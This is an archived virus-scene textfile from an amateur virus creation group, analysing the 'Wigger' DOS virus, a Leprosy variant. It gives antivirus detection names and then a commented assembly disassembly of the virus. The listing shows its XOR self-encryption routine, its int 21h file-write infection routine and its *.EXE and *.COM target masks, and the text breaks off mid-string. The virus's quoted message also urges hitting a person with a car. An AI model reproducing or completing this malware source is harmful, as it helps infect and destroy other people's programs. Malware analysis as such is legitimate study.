💾 Archived View for spam.works › mirrors › textfiles › virus › avcr-01.008 captured on 2023-06-16 at 21:01:07.
-=-=-=-=-=-=-
Distributed By Amateur Virus Creation & Research Group (AVCR)
-----------------------------------------------------------------------------
Research of the wigger virus by Security Threat
Name: Wigger
-----------------------------------------------------------------------------
Alias:
-----------------------------------------------------------------------------
Type Of Code: Not Informed
-----------------------------------------------------------------------------
VSUM Information: No info found on WIGGER.COM
-----------------------------------------------------------------------------
Antivirus Detection:
(1) ThunderByte Anti Virus (TBAV) reported wigger.com as leprosy
(2) Frisk Software's F-Protect (F-PROT) reported wigger.com as leprosy.b
(3) McAfee Software's Anti Virus (SCAN.EXE) reported wigger.com as leprosy.b
(4) Microsoft Anti Virus (MSAV.EXE) reported wigger.com as "the leprosy virus"
-----------------------------------------------------------------------------
Execution Results: Infects all COM and EXE files.
-----------------------------------------------------------------------------
Cleaning Recommendations: Impossible. Infected programs must be deleted.
-----------------------------------------------------------------------------
Researcher's Notes: While infecting, it displays either "Program too big to fit in memory" or "You have noticed wiggers seem to have taken over the high school scene." "If you see one, please hit him with your car". It is a variant of leprosy.
Also "News flash", "Plague", "viper", "busted", "leprosy-c", "leprosy-d", "scribble", "seneca", "surfer", "xarbras", and "angel of death"
-----------------------------------------------------------------------------
Disassembly of the wigger Virus

PAGE 60,132
;========== CODE_SEG_1 =========================================================
CODE_SEG_1      segment para public
                assume  CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1
                org     100h
;===============================================================================
;
;   ENTRY POINT
;
;===============================================================================
;===============================================================================
;
;   PROCEDURE proc_start
;
;===============================================================================
proc_start      proc    far
start:                                          ; N-Ref=0
                call    near ptr proc_2
                jmp     loc_5
proc_start      endp

var1_106        db      0                       ; XOR key byte used by proc_2

;===============================================================================
;
;   PROCEDURE proc_1
;
;===============================================================================
proc_1          proc    near
                mov     BX,Word Ptr var1_2a3    ; [6556:02A3] = 0
                push    BX
                call    near ptr proc_2
                pop     BX
                mov     CX,29Ah
                mov     DX,offset var1_100
                mov     AH,40h                  ; '@'
                int     21h                     ; DOS func ( ah ) = 40h
                                                ; Write to file or device
                                                ; BX-file handle
                                                ; CX-bytes to write  DS:DX-buffer
                                                ; if CF=0 AX-bytes written
                                                ; else AX-ret code
                call    near ptr proc_2
                retn
proc_1          endp

;===============================================================================
;
;   PROCEDURE proc_2
;
;===============================================================================
; XORs every byte from var1_131 through offset 3CBh with the byte at var1_106.
proc_2          proc    near
                mov     BX,offset var1_131
loc_1:                                          ; N-Ref=1
                mov     AH,Byte Ptr [BX]
                xor     AH,Byte Ptr var1_106    ; [6556:0106] = 8B00h
                mov     Byte Ptr [BX],AH
                inc     BX
                cmp     BX,3CBh
                jle     loc_1                   ; Jump if not greater ( <= )
                retn
proc_2          endp

var1_131        db      '*.EXE'
                db      0
var1_137        db      '*.COM'
                db      0
var1_13d        db      2Eh, 2Eh, 0
var1_140        db      0Dh, 0Ah
                db      'Program too big to fit in memory